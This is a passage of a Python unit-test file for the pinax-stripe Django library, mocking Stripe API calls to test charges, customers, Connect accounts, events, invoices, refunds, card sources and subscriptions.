            amount=decimal.Decimal("10"),
            customer=self.customer,
            on_behalf_of="account",
        )
        self.assertTrue(CreateMock.called)
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["on_behalf_of"], "account")
        self.assertTrue(SyncMock.called)
        self.assertTrue(SendReceiptMock.called)

    @patch("pinax.stripe.hooks.hookset.send_receipt")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.create")
    def test_create_with_destination_and_on_behalf_of(self, CreateMock, SyncMock, SendReceiptMock):
        # destination_account and on_behalf_of are mutually exclusive.
        with self.assertRaises(ValueError):
            charges.create(
                amount=decimal.Decimal("10"),
                customer=self.customer,
                destination_account="xxx",
                on_behalf_of="account",
            )

    @patch("stripe.Charge.create")
    def test_create_not_decimal_raises_exception(self, CreateMock):
        with self.assertRaises(ValueError):
            charges.create(
                amount=decimal.Decimal("100"),
                customer=self.customer,
                application_fee=10
            )

    @patch("stripe.Charge.create")
    def test_create_app_fee_no_dest_raises_exception(self, CreateMock):
        with self.assertRaises(ValueError):
            charges.create(
                amount=decimal.Decimal("100"),
                customer=self.customer,
                application_fee=decimal.Decimal("10")
            )

    @patch("stripe.Charge.create")
    def test_create_app_fee_dest_acct_and_dest_amt_raises_exception(self, CreateMock):
        with self.assertRaises(ValueError):
            charges.create(
                amount=decimal.Decimal("100"),
                customer=self.customer,
                application_fee=decimal.Decimal("10"),
                destination_account="xxx",
                destination_amount=decimal.Decimal("15")
            )

    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.capture")
    def test_capture(self, CaptureMock, SyncMock):
        charges.capture(Charge(stripe_id="ch_A", amount=decimal.Decimal("100"), currency="usd"))
        self.assertTrue(CaptureMock.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.capture")
    def test_capture_with_amount(self, CaptureMock, SyncMock):
        charge = Charge(stripe_id="ch_A", amount=decimal.Decimal("100"), currency="usd")
        charges.capture(charge, amount=decimal.Decimal("50"), idempotency_key="IDEM")
        self.assertTrue(CaptureMock.called)
        _, kwargs = CaptureMock.call_args
        self.assertEqual(kwargs["amount"], 5000)
        self.assertEqual(kwargs["idempotency_key"], "IDEM")
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Charge.capture")
    def test_capture_with_connect(self, CaptureMock, SyncMock):
        account = Account(stripe_id="acc_001")
        customer = Customer(stripe_id="cus_001", stripe_account=account)
        charges.capture(Charge(stripe_id="ch_A", amount=decimal.Decimal("100"), currency="usd", customer=customer))
        self.assertTrue(CaptureMock.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.charges.sync_charge")
    def test_update_availability(self, SyncMock):
        Charge.objects.create(customer=self.customer, amount=decimal.Decimal("100"), currency="usd", paid=True, captured=True, available=False, refunded=False)
        charges.update_charge_availability()
        self.assertTrue(SyncMock.called)
class CouponsTests(TestCase):
    """Tests for pinax.stripe.actions.coupons.purge_local."""

    def test_purge_local(self):
        # Decimal is constructed from a string, not the float literal
        # 100.00: the float form is only exact by accident and the string
        # form is the documented-safe idiom.
        Coupon.objects.create(stripe_id="100OFF", percent_off=decimal.Decimal("100.00"))
        self.assertTrue(Coupon.objects.filter(stripe_id="100OFF").exists())
        coupons.purge_local({"id": "100OFF"})
        self.assertFalse(Coupon.objects.filter(stripe_id="100OFF").exists())

    def test_purge_local_with_account(self):
        """purge_local only deletes the coupon scoped to the given account."""
        account = Account.objects.create(stripe_id="acc_XXX")
        Coupon.objects.create(stripe_id="100OFF", percent_off=decimal.Decimal("100.00"), stripe_account=account)
        self.assertTrue(Coupon.objects.filter(stripe_id="100OFF").exists())
        # Without stripe_account the account-scoped coupon must survive.
        coupons.purge_local({"id": "100OFF"})
        self.assertTrue(Coupon.objects.filter(stripe_id="100OFF").exists())
        coupons.purge_local({"id": "100OFF"}, stripe_account=account)
        self.assertFalse(Coupon.objects.filter(stripe_id="100OFF").exists())
class CustomersTests(TestCase):
    """Tests for pinax.stripe.actions.customers.

    `assertEquals` (a deprecated alias, removed in Python 3.12) has been
    replaced with `assertEqual` throughout.
    """

    def setUp(self):
        self.User = get_user_model()
        self.user = self.User.objects.create_user(
            username="patrick",
            email="paltman@example.com"
        )
        self.plan = Plan.objects.create(
            stripe_id="p1",
            amount=10,
            currency="usd",
            interval="monthly",
            interval_count=1,
            name="Pro"
        )

    def test_get_customer_for_user(self):
        expected = Customer.objects.create(stripe_id="x", user=self.user)
        actual = customers.get_customer_for_user(self.user)
        self.assertEqual(expected, actual)

    def test_get_customer_for_user_not_exists(self):
        actual = customers.get_customer_for_user(self.user)
        self.assertIsNone(actual)

    @patch("pinax.stripe.actions.customers.sync_customer")
    @patch("stripe.Customer.retrieve")
    def test_set_default_source(self, RetrieveMock, SyncMock):
        customers.set_default_source(Customer(), "the source")
        self.assertEqual(RetrieveMock().default_source, "the source")
        self.assertTrue(RetrieveMock().save.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.customers.sync_customer")
    @patch("stripe.Customer.create")
    def test_customer_create_user_only(self, CreateMock, SyncMock):
        CreateMock.return_value = dict(id="cus_XXXXX")
        customer = customers.create(self.user)
        self.assertEqual(customer.user, self.user)
        self.assertEqual(customer.stripe_id, "cus_XXXXX")
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["email"], self.user.email)
        self.assertIsNone(kwargs["source"])
        self.assertIsNone(kwargs["plan"])
        self.assertIsNone(kwargs["trial_end"])
        self.assertTrue(SyncMock.called)

    @patch("stripe.Customer.retrieve")
    @patch("stripe.Customer.create")
    def test_customer_create_user_duplicate(self, CreateMock, RetrieveMock):
        # Create an existing database customer for this user
        original = Customer.objects.create(user=self.user, stripe_id="cus_XXXXX")
        new_customer = Mock()
        RetrieveMock.return_value = new_customer
        customer = customers.create(self.user)
        # But only one customer will exist - the original one
        self.assertEqual(Customer.objects.count(), 1)
        self.assertEqual(customer.stripe_id, original.stripe_id)
        # Check that the customer hasn't been modified
        self.assertEqual(customer.user, self.user)
        self.assertEqual(customer.stripe_id, "cus_XXXXX")
        CreateMock.assert_not_called()

    @patch("stripe.Customer.retrieve")
    @patch("stripe.Customer.create")
    def test_customer_create_local_customer_but_no_remote(self, CreateMock, RetrieveMock):
        # Create an existing database customer for this user
        Customer.objects.create(user=self.user, stripe_id="cus_XXXXX")
        RetrieveMock.side_effect = stripe.error.InvalidRequestError(
            message="invalid", param=None)
        # customers.Create will return a new customer instance
        CreateMock.return_value = {
            "id": "cus_YYYYY",
            "account_balance": 0,
            "currency": "us",
            "delinquent": False,
            "default_source": "",
            "sources": {"data": []},
            "subscriptions": {"data": []},
        }
        customer = customers.create(self.user)
        # But a customer *was* retrieved, but not found
        RetrieveMock.assert_called_once_with("cus_XXXXX")
        # But only one customer will exist - the original one
        self.assertEqual(Customer.objects.count(), 1)
        self.assertEqual(customer.stripe_id, "cus_YYYYY")
        # Check that the customer hasn't been modified
        self.assertEqual(customer.user, self.user)
        self.assertEqual(customer.stripe_id, "cus_YYYYY")
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["email"], self.user.email)
        self.assertIsNone(kwargs["source"])
        self.assertIsNone(kwargs["plan"])
        self.assertIsNone(kwargs["trial_end"])

    @patch("pinax.stripe.actions.invoices.create_and_pay")
    @patch("pinax.stripe.actions.customers.sync_customer")
    @patch("stripe.Customer.create")
    def test_customer_create_user_with_plan(self, CreateMock, SyncMock, CreateAndPayMock):
        Plan.objects.create(
            stripe_id="pro-monthly",
            name="Pro ($19.99/month)",
            amount=19.99,
            interval="monthly",
            interval_count=1,
            currency="usd"
        )
        CreateMock.return_value = dict(id="cus_YYYYYYYYYYYYY")
        customer = customers.create(self.user, card="token232323", plan=self.plan)
        self.assertEqual(customer.user, self.user)
        self.assertEqual(customer.stripe_id, "cus_YYYYYYYYYYYYY")
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["email"], self.user.email)
        self.assertEqual(kwargs["source"], "token232323")
        self.assertEqual(kwargs["plan"], self.plan)
        self.assertIsNotNone(kwargs["trial_end"])
        self.assertTrue(SyncMock.called)
        self.assertTrue(CreateAndPayMock.called)

    @patch("pinax.stripe.actions.invoices.create_and_pay")
    @patch("pinax.stripe.actions.customers.sync_customer")
    @patch("stripe.Customer.create")
    def test_customer_create_user_with_plan_and_quantity(self, CreateMock, SyncMock, CreateAndPayMock):
        Plan.objects.create(
            stripe_id="pro-monthly",
            name="Pro ($19.99/month each)",
            amount=19.99,
            interval="monthly",
            interval_count=1,
            currency="usd"
        )
        CreateMock.return_value = dict(id="cus_YYYYYYYYYYYYY")
        customer = customers.create(self.user, card="token232323", plan=self.plan, quantity=42)
        self.assertEqual(customer.user, self.user)
        self.assertEqual(customer.stripe_id, "cus_YYYYYYYYYYYYY")
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["email"], self.user.email)
        self.assertEqual(kwargs["source"], "token232323")
        self.assertEqual(kwargs["plan"], self.plan)
        self.assertEqual(kwargs["quantity"], 42)
        self.assertIsNotNone(kwargs["trial_end"])
        self.assertTrue(SyncMock.called)
        self.assertTrue(CreateAndPayMock.called)

    @patch("stripe.Customer.retrieve")
    def test_purge(self, RetrieveMock):
        customer = Customer.objects.create(
            user=self.user,
            stripe_id="cus_xxxxxxxxxxxxxxx"
        )
        customers.purge(customer)
        self.assertTrue(RetrieveMock().delete.called)
        # Purging detaches the user and stamps date_purged instead of
        # deleting the row.
        self.assertIsNone(Customer.objects.get(stripe_id=customer.stripe_id).user)
        self.assertIsNotNone(Customer.objects.get(stripe_id=customer.stripe_id).date_purged)

    @patch("stripe.Customer.retrieve")
    def test_purge_connected(self, RetrieveMock):
        account = Account.objects.create(stripe_id="acc_XXX")
        customer = Customer.objects.create(
            user=self.user,
            stripe_account=account,
            stripe_id="cus_xxxxxxxxxxxxxxx",
        )
        UserAccount.objects.create(user=self.user, account=account, customer=customer)
        customers.purge(customer)
        self.assertTrue(RetrieveMock().delete.called)
        self.assertIsNone(Customer.objects.get(stripe_id=customer.stripe_id).user)
        self.assertIsNotNone(Customer.objects.get(stripe_id=customer.stripe_id).date_purged)
        self.assertFalse(UserAccount.objects.exists())
        self.assertTrue(self.User.objects.exists())

    @patch("stripe.Customer.retrieve")
    def test_purge_already_deleted(self, RetrieveMock):
        RetrieveMock().delete.side_effect = stripe.error.InvalidRequestError("No such customer:", "error")
        customer = Customer.objects.create(
            user=self.user,
            stripe_id="cus_xxxxxxxxxxxxxxx"
        )
        customers.purge(customer)
        self.assertTrue(RetrieveMock().delete.called)
        self.assertIsNone(Customer.objects.get(stripe_id=customer.stripe_id).user)
        self.assertIsNotNone(Customer.objects.get(stripe_id=customer.stripe_id).date_purged)

    @patch("stripe.Customer.retrieve")
    def test_purge_already_some_other_error(self, RetrieveMock):
        # Any InvalidRequestError other than "No such customer" must propagate.
        RetrieveMock().delete.side_effect = stripe.error.InvalidRequestError("Bad", "error")
        customer = Customer.objects.create(
            user=self.user,
            stripe_id="cus_xxxxxxxxxxxxxxx"
        )
        with self.assertRaises(stripe.error.InvalidRequestError):
            customers.purge(customer)
        self.assertTrue(RetrieveMock().delete.called)
        self.assertIsNotNone(Customer.objects.get(stripe_id=customer.stripe_id).user)
        self.assertIsNone(Customer.objects.get(stripe_id=customer.stripe_id).date_purged)

    def test_can_charge(self):
        customer = Customer(default_source="card_001")
        self.assertTrue(customers.can_charge(customer))

    def test_can_charge_false_purged(self):
        customer = Customer(default_source="card_001", date_purged=timezone.now())
        self.assertFalse(customers.can_charge(customer))

    def test_can_charge_false_no_default_source(self):
        customer = Customer()
        self.assertFalse(customers.can_charge(customer))

    @patch("pinax.stripe.actions.customers.sync_customer")
    def test_link_customer(self, SyncMock):
        Customer.objects.create(stripe_id="cu_123")
        message = dict(data=dict(object=dict(id="cu_123")))
        event = Event.objects.create(validated_message=message, kind="customer.created")
        customers.link_customer(event)
        self.assertEqual(event.customer.stripe_id, "cu_123")
        self.assertTrue(SyncMock.called)

    def test_link_customer_non_customer_event(self):
        Customer.objects.create(stripe_id="cu_123")
        message = dict(data=dict(object=dict(customer="cu_123")))
        event = Event.objects.create(validated_message=message, kind="invoice.created")
        customers.link_customer(event)
        self.assertEqual(event.customer.stripe_id, "cu_123")

    def test_link_customer_non_customer_event_no_customer(self):
        Customer.objects.create(stripe_id="cu_123")
        message = dict(data=dict(object=dict()))
        event = Event.objects.create(validated_message=message, kind="transfer.created")
        customers.link_customer(event)
        # NOTE(review): the second argument to assertIsNone is only the
        # failure message, not a comparison value.
        self.assertIsNone(event.customer, "cu_123")

    @patch("pinax.stripe.actions.customers.sync_customer")
    def test_link_customer_does_not_exist(self, SyncMock):
        message = dict(data=dict(object=dict(id="cu_123")))
        event = Event.objects.create(stripe_id="evt_1", validated_message=message, kind="customer.created")
        customers.link_customer(event)
        # get() raises DoesNotExist if the customer was not auto-created.
        Customer.objects.get(stripe_id="cu_123")
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.customers.sync_customer")
    def test_link_customer_does_not_exist_connected(self, SyncMock):
        message = dict(data=dict(object=dict(id="cu_123")))
        account = Account.objects.create(stripe_id="acc_XXX")
        event = Event.objects.create(stripe_id="evt_1", validated_message=message, kind="customer.created", stripe_account=account)
        customers.link_customer(event)
        Customer.objects.get(stripe_id="cu_123", stripe_account=account)
        self.assertTrue(SyncMock.called)
class CustomersWithConnectTests(TestCase):
    """Tests for customers actions when a Stripe Connect account is involved.

    `assertEquals` (a deprecated alias, removed in Python 3.12) has been
    replaced with `assertEqual`.
    """

    def setUp(self):
        self.User = get_user_model()
        self.user = self.User.objects.create_user(
            username="patrick",
            email="paltman@example.com"
        )
        self.plan = Plan.objects.create(
            stripe_id="p1",
            amount=10,
            currency="usd",
            interval="monthly",
            interval_count=1,
            name="Pro"
        )
        self.account = Account.objects.create(
            stripe_id="acc_XXX"
        )

    def test_get_customer_for_user_with_stripe_account(self):
        expected = Customer.objects.create(
            stripe_id="x",
            stripe_account=self.account)
        UserAccount.objects.create(user=self.user, account=self.account, customer=expected)
        actual = customers.get_customer_for_user(
            self.user, stripe_account=self.account)
        self.assertEqual(expected, actual)

    def test_get_customer_for_user_with_stripe_account_and_legacy_customer(self):
        # A legacy (non-connect) customer must not match an account lookup.
        Customer.objects.create(user=self.user, stripe_id="x")
        self.assertIsNone(customers.get_customer_for_user(
            self.user, stripe_account=self.account))

    @patch("pinax.stripe.actions.customers.sync_customer")
    @patch("stripe.Customer.create")
    def test_customer_create_with_connect(self, CreateMock, SyncMock):
        CreateMock.return_value = dict(id="cus_XXXXX")
        customer = customers.create(self.user, stripe_account=self.account)
        # Connect customers are not linked directly to the user record.
        self.assertIsNone(customer.user)
        self.assertEqual(customer.stripe_id, "cus_XXXXX")
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["email"], self.user.email)
        self.assertEqual(kwargs["stripe_account"], self.account.stripe_id)
        self.assertIsNone(kwargs["source"])
        self.assertIsNone(kwargs["plan"])
        self.assertIsNone(kwargs["trial_end"])
        self.assertTrue(SyncMock.called)

    @patch("stripe.Customer.retrieve")
    @patch("pinax.stripe.actions.customers.sync_customer")
    @patch("stripe.Customer.create")
    def test_customer_create_with_connect_and_stale_user_account(self, CreateMock, SyncMock, RetrieveMock):
        CreateMock.return_value = dict(id="cus_XXXXX")
        RetrieveMock.side_effect = stripe.error.InvalidRequestError(
            message="Not Found", param="stripe_id"
        )
        ua = UserAccount.objects.create(
            user=self.user,
            account=self.account,
            customer=Customer.objects.create(stripe_id="cus_Z", stripe_account=self.account))
        customer = customers.create(self.user, stripe_account=self.account)
        self.assertIsNone(customer.user)
        self.assertEqual(customer.stripe_id, "cus_XXXXX")
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["email"], self.user.email)
        self.assertEqual(kwargs["stripe_account"], self.account.stripe_id)
        self.assertIsNone(kwargs["source"])
        self.assertIsNone(kwargs["plan"])
        self.assertIsNone(kwargs["trial_end"])
        self.assertTrue(SyncMock.called)
        # The stale UserAccount is re-pointed at the freshly created customer.
        self.assertEqual(self.user.user_accounts.get(), ua)
        self.assertEqual(ua.customer, customer)
        RetrieveMock.assert_called_once_with("cus_Z", stripe_account=self.account.stripe_id)

    @patch("stripe.Customer.retrieve")
    def test_customer_create_with_connect_with_existing_customer(self, RetrieveMock):
        expected = Customer.objects.create(
            stripe_id="x",
            stripe_account=self.account)
        UserAccount.objects.create(user=self.user, account=self.account, customer=expected)
        customer = customers.create(self.user, stripe_account=self.account)
        self.assertEqual(customer, expected)
        RetrieveMock.assert_called_once_with("x", stripe_account=self.account.stripe_id)

    @patch("pinax.stripe.actions.invoices.create_and_pay")
    @patch("pinax.stripe.actions.customers.sync_customer")
    @patch("stripe.Customer.create")
    def test_customer_create_user_with_plan(self, CreateMock, SyncMock, CreateAndPayMock):
        Plan.objects.create(
            stripe_id="pro-monthly",
            name="Pro ($19.99/month)",
            amount=19.99,
            interval="monthly",
            interval_count=1,
            currency="usd"
        )
        CreateMock.return_value = dict(id="cus_YYYYYYYYYYYYY")
        customer = customers.create(self.user, card="token232323", plan=self.plan, stripe_account=self.account)
        self.assertEqual(customer.stripe_id, "cus_YYYYYYYYYYYYY")
        _, kwargs = CreateMock.call_args
        self.assertEqual(kwargs["email"], self.user.email)
        self.assertEqual(kwargs["source"], "token232323")
        self.assertEqual(kwargs["plan"], self.plan)
        self.assertIsNotNone(kwargs["trial_end"])
        self.assertTrue(SyncMock.called)
        self.assertTrue(CreateAndPayMock.called)
class EventsTests(TestCase):
    """Tests for pinax.stripe.actions.events.

    `assertEquals` (a deprecated alias, removed in Python 3.12) has been
    replaced with `assertEqual`. The explicit `super(EventsTests, cls)`
    form is kept for compatibility with the file's py2-era style.
    """

    @classmethod
    def setUpClass(cls):
        super(EventsTests, cls).setUpClass()
        cls.account = Account.objects.create(stripe_id="acc_001")

    def test_dupe_event_exists(self):
        Event.objects.create(stripe_id="evt_003", kind="foo", livemode=True, webhook_message="{}", api_version="", request="", pending_webhooks=0)
        self.assertTrue(events.dupe_event_exists("evt_003"))

    @patch("pinax.stripe.webhooks.AccountUpdatedWebhook.process")
    def test_add_event(self, ProcessMock):
        events.add_event(stripe_id="evt_001", kind="account.updated", livemode=True, message={})
        event = Event.objects.get(stripe_id="evt_001")
        self.assertEqual(event.kind, "account.updated")
        self.assertTrue(ProcessMock.called)

    @patch("pinax.stripe.webhooks.AccountUpdatedWebhook.process")
    def test_add_event_connect(self, ProcessMock):
        events.add_event(stripe_id="evt_001", kind="account.updated", livemode=True, message={"account": self.account.stripe_id})
        event = Event.objects.get(stripe_id="evt_001", stripe_account=self.account)
        self.assertEqual(event.kind, "account.updated")
        self.assertTrue(ProcessMock.called)

    @patch("pinax.stripe.webhooks.AccountUpdatedWebhook.process")
    def test_add_event_missing_account_connect(self, ProcessMock):
        # An unknown "account" in the message results in a local Account row.
        events.add_event(stripe_id="evt_001", kind="account.updated", livemode=True, message={"account": "acc_NEW"})
        event = Event.objects.get(stripe_id="evt_001", stripe_account=Account.objects.get(stripe_id="acc_NEW"))
        self.assertEqual(event.kind, "account.updated")
        self.assertTrue(ProcessMock.called)

    def test_add_event_new_webhook_kind(self):
        # Unknown webhook kinds are stored but never processed/validated.
        events.add_event(stripe_id="evt_002", kind="patrick.got.coffee", livemode=True, message={})
        event = Event.objects.get(stripe_id="evt_002")
        self.assertEqual(event.processed, False)
        self.assertIsNone(event.validated_message)
class InvoicesTests(TestCase):
    """Tests for ``pinax.stripe.actions.invoices``."""

    @patch("stripe.Invoice.create")
    def test_create(self, CreateMock):
        invoices.create(Mock())
        self.assertTrue(CreateMock.called)

    @patch("pinax.stripe.actions.invoices.sync_invoice_from_stripe_data")
    def test_pay(self, SyncMock):
        # An open, unpaid invoice is paid and the result synced locally.
        open_invoice = Mock(paid=False, closed=False)
        self.assertTrue(invoices.pay(open_invoice))
        self.assertTrue(open_invoice.stripe_invoice.pay.called)
        self.assertTrue(SyncMock.called)

    def test_pay_invoice_paid(self):
        # Paying an already-paid invoice is a no-op.
        paid_invoice = Mock(paid=True, closed=False)
        self.assertFalse(invoices.pay(paid_invoice))
        self.assertFalse(paid_invoice.stripe_invoice.pay.called)

    def test_pay_invoice_closed(self):
        # Paying a closed invoice is a no-op.
        closed_invoice = Mock(paid=False, closed=True)
        self.assertFalse(invoices.pay(closed_invoice))
        self.assertFalse(closed_invoice.stripe_invoice.pay.called)

    @patch("stripe.Invoice.create")
    def test_create_and_pay(self, CreateMock):
        # A non-zero balance triggers an immediate pay() on the new invoice.
        stripe_invoice = CreateMock()
        stripe_invoice.amount_due = 100
        self.assertTrue(invoices.create_and_pay(Mock()))
        self.assertTrue(stripe_invoice.pay.called)

    @patch("stripe.Invoice.create")
    def test_create_and_pay_amount_due_0(self, CreateMock):
        # Nothing due, nothing charged.
        stripe_invoice = CreateMock()
        stripe_invoice.amount_due = 0
        self.assertTrue(invoices.create_and_pay(Mock()))
        self.assertFalse(stripe_invoice.pay.called)

    @patch("stripe.Invoice.create")
    def test_create_and_pay_invalid_request_error(self, CreateMock):
        # A failing pay() is reported as False rather than raising.
        stripe_invoice = CreateMock()
        stripe_invoice.amount_due = 100
        stripe_invoice.pay.side_effect = stripe.error.InvalidRequestError("Bad", "error")
        self.assertFalse(invoices.create_and_pay(Mock()))
        self.assertTrue(stripe_invoice.pay.called)

    @patch("stripe.Invoice.create")
    def test_create_and_pay_invalid_request_error_on_create(self, CreateMock):
        # A failing create() is likewise reported as False.
        CreateMock.side_effect = stripe.error.InvalidRequestError("Bad", "error")
        self.assertFalse(invoices.create_and_pay(Mock()))
class RefundsTests(TestCase):
    """Tests for ``pinax.stripe.actions.refunds``.

    Fixes: deprecated ``assertEquals`` → ``assertEqual``; membership checks
    use ``assertIn``/``assertNotIn`` for clearer failure messages.
    """

    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Refund.create")
    def test_create_amount_none(self, RefundMock, SyncMock):
        # Without an explicit amount, no "amount" kwarg is sent to Stripe.
        refunds.create(Mock())
        self.assertTrue(RefundMock.called)
        _, kwargs = RefundMock.call_args
        self.assertNotIn("amount", kwargs)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.charges.calculate_refund_amount")
    @patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
    @patch("stripe.Refund.create")
    def test_create_with_amount(self, RefundMock, SyncMock, CalcMock):
        ChargeMock = Mock()
        CalcMock.return_value = decimal.Decimal("10")
        refunds.create(ChargeMock, amount=decimal.Decimal("10"))
        self.assertTrue(RefundMock.called)
        _, kwargs = RefundMock.call_args
        self.assertIn("amount", kwargs)
        # Decimal dollars are converted to integer cents for the API.
        self.assertEqual(kwargs["amount"], 1000)
        self.assertTrue(SyncMock.called)
class SourcesTests(TestCase):
    """Tests for ``pinax.stripe.actions.sources``.

    Fixes: deprecated ``assertEquals`` → ``assertEqual``; identity checks use
    ``assertIsNotNone``/``assertIsNone`` instead of ``assertTrue(x is ...)``.
    """

    @patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
    def test_create_card(self, SyncMock):
        CustomerMock = Mock()
        result = sources.create_card(CustomerMock, token="token")
        self.assertIsNotNone(result)
        self.assertTrue(CustomerMock.stripe_customer.sources.create.called)
        _, kwargs = CustomerMock.stripe_customer.sources.create.call_args
        self.assertEqual(kwargs["source"], "token")
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
    def test_update_card(self, SyncMock):
        CustomerMock = Mock()
        SourceMock = CustomerMock.stripe_customer.sources.retrieve()
        result = sources.update_card(CustomerMock, "")
        self.assertIsNotNone(result)
        self.assertTrue(CustomerMock.stripe_customer.sources.retrieve.called)
        self.assertTrue(SourceMock.save.called)
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
    def test_update_card_name_not_none(self, SyncMock):
        CustomerMock = Mock()
        SourceMock = CustomerMock.stripe_customer.sources.retrieve()
        sources.update_card(CustomerMock, "", name="My Visa")
        self.assertTrue(CustomerMock.stripe_customer.sources.retrieve.called)
        self.assertTrue(SourceMock.save.called)
        self.assertEqual(SourceMock.name, "My Visa")
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
    def test_update_card_exp_month_not_none(self, SyncMock):
        CustomerMock = Mock()
        SourceMock = CustomerMock.stripe_customer.sources.retrieve()
        sources.update_card(CustomerMock, "", exp_month="My Visa")
        self.assertTrue(CustomerMock.stripe_customer.sources.retrieve.called)
        self.assertTrue(SourceMock.save.called)
        self.assertEqual(SourceMock.exp_month, "My Visa")
        self.assertTrue(SyncMock.called)

    @patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
    def test_update_card_exp_year_not_none(self, SyncMock):
        CustomerMock = Mock()
        SourceMock = CustomerMock.stripe_customer.sources.retrieve()
        sources.update_card(CustomerMock, "", exp_year="My Visa")
        self.assertTrue(CustomerMock.stripe_customer.sources.retrieve.called)
        self.assertTrue(SourceMock.save.called)
        self.assertEqual(SourceMock.exp_year, "My Visa")
        self.assertTrue(SyncMock.called)

    @skipIf(django.VERSION < (1, 9), "Only for django 1.9+")
    def test_delete_card_dj19(self):
        # Django 1.9+ delete() returns a (count, per-model) tuple.
        CustomerMock = Mock()
        result = sources.delete_card(CustomerMock, source="card_token")
        self.assertEqual(result, (0, {"pinax_stripe.Card": 0}))
        self.assertTrue(CustomerMock.stripe_customer.sources.retrieve().delete.called)

    @skipIf(django.VERSION >= (1, 9), "Only for django before 1.9")
    def test_delete_card(self):
        # Older Django delete() returns None.
        CustomerMock = Mock()
        result = sources.delete_card(CustomerMock, source="card_token")
        self.assertIsNone(result)
        self.assertTrue(CustomerMock.stripe_customer.sources.retrieve().delete.called)

    def test_delete_card_object(self):
        # A "card_"-prefixed stripe id is removed locally.
        User = get_user_model()
        user = User.objects.create_user(
            username="patrick",
            email="paltman@example.com"
        )
        customer = Customer.objects.create(
            user=user,
            stripe_id="cus_xxxxxxxxxxxxxxx"
        )
        card = Card.objects.create(
            customer=customer,
            stripe_id="card_stripe",
            address_line_1_check="check",
            address_zip_check="check",
            country="us",
            cvc_check="check",
            exp_month=1,
            exp_year=2000,
            funding="funding",
            fingerprint="fingerprint"
        )
        pk = card.pk
        sources.delete_card_object("card_stripe")
        self.assertFalse(Card.objects.filter(pk=pk).exists())

    def test_delete_card_object_not_card(self):
        # Non-card stripe ids (e.g. bitcoin receivers) must be left alone.
        User = get_user_model()
        user = User.objects.create_user(
            username="patrick",
            email="paltman@example.com"
        )
        customer = Customer.objects.create(
            user=user,
            stripe_id="cus_xxxxxxxxxxxxxxx"
        )
        card = Card.objects.create(
            customer=customer,
            stripe_id="bitcoin_stripe",
            address_line_1_check="check",
            address_zip_check="check",
            country="us",
            cvc_check="check",
            exp_month=1,
            exp_year=2000,
            funding="funding",
            fingerprint="fingerprint"
        )
        pk = card.pk
        sources.delete_card_object("bitcoin_stripe")
        self.assertTrue(Card.objects.filter(pk=pk).exists())
class SubscriptionsTests(TestCase):
    """Tests for ``pinax.stripe.actions.subscriptions``.

    Fixes: deprecated ``assertEquals`` → ``assertEqual``;
    ``assertEquals(x, None)`` → ``assertIsNone(x)``.
    """

    @classmethod
    def setUpClass(cls):
        super(SubscriptionsTests, cls).setUpClass()
        cls.User = get_user_model()
        cls.user = cls.User.objects.create_user(
            username="patrick",
            email="paltman@example.com"
        )
        cls.customer = Customer.objects.create(
            user=cls.user,
            stripe_id="cus_xxxxxxxxxxxxxxx"
        )
        cls.plan = Plan.objects.create(
            stripe_id="the-plan",
            amount=2,
            interval_count=1,
        )
        cls.account = Account.objects.create(stripe_id="acct_xx")
        # Customer living on a connected Stripe account (Connect flows).
        cls.connected_customer = Customer.objects.create(
            stripe_id="cus_yyyyyyyyyyyyyyy",
            stripe_account=cls.account,
        )
        UserAccount.objects.create(user=cls.user,
                                   customer=cls.connected_customer,
                                   account=cls.account)

    def test_has_active_subscription(self):
        plan = Plan.objects.create(
            amount=10,
            currency="usd",
            interval="monthly",
            interval_count=1,
            name="Pro"
        )
        Subscription.objects.create(
            customer=self.customer,
            plan=plan,
            quantity=1,
            start=timezone.now(),
            status="active",
            cancel_at_period_end=False
        )
        self.assertTrue(subscriptions.has_active_subscription(self.customer))

    def test_has_active_subscription_False_no_subscription(self):
        self.assertFalse(subscriptions.has_active_subscription(self.customer))

    def test_has_active_subscription_False_expired(self):
        plan = Plan.objects.create(
            amount=10,
            currency="usd",
            interval="monthly",
            interval_count=1,
            name="Pro"
        )
        Subscription.objects.create(
            customer=self.customer,
            plan=plan,
            quantity=1,
            start=timezone.now(),
            status="active",
            cancel_at_period_end=False,
            ended_at=timezone.now() - datetime.timedelta(days=3)
        )
        self.assertFalse(subscriptions.has_active_subscription(self.customer))

    def test_has_active_subscription_ended_but_not_expired(self):
        plan = Plan.objects.create(
            amount=10,
            currency="usd",
            interval="monthly",
            interval_count=1,
            name="Pro"
        )
        Subscription.objects.create(
            customer=self.customer,
            plan=plan,
            quantity=1,
            start=timezone.now(),
            status="active",
            cancel_at_period_end=False,
            ended_at=timezone.now() + datetime.timedelta(days=3)
        )
        self.assertTrue(subscriptions.has_active_subscription(self.customer))

    @patch("stripe.Subscription")
    @patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
    def test_cancel_subscription(self, SyncMock, StripeSubMock):
        subscription = Subscription(stripe_id="sub_X", customer=self.customer)
        obj = object()
        SyncMock.return_value = obj
        sub = subscriptions.cancel(subscription)
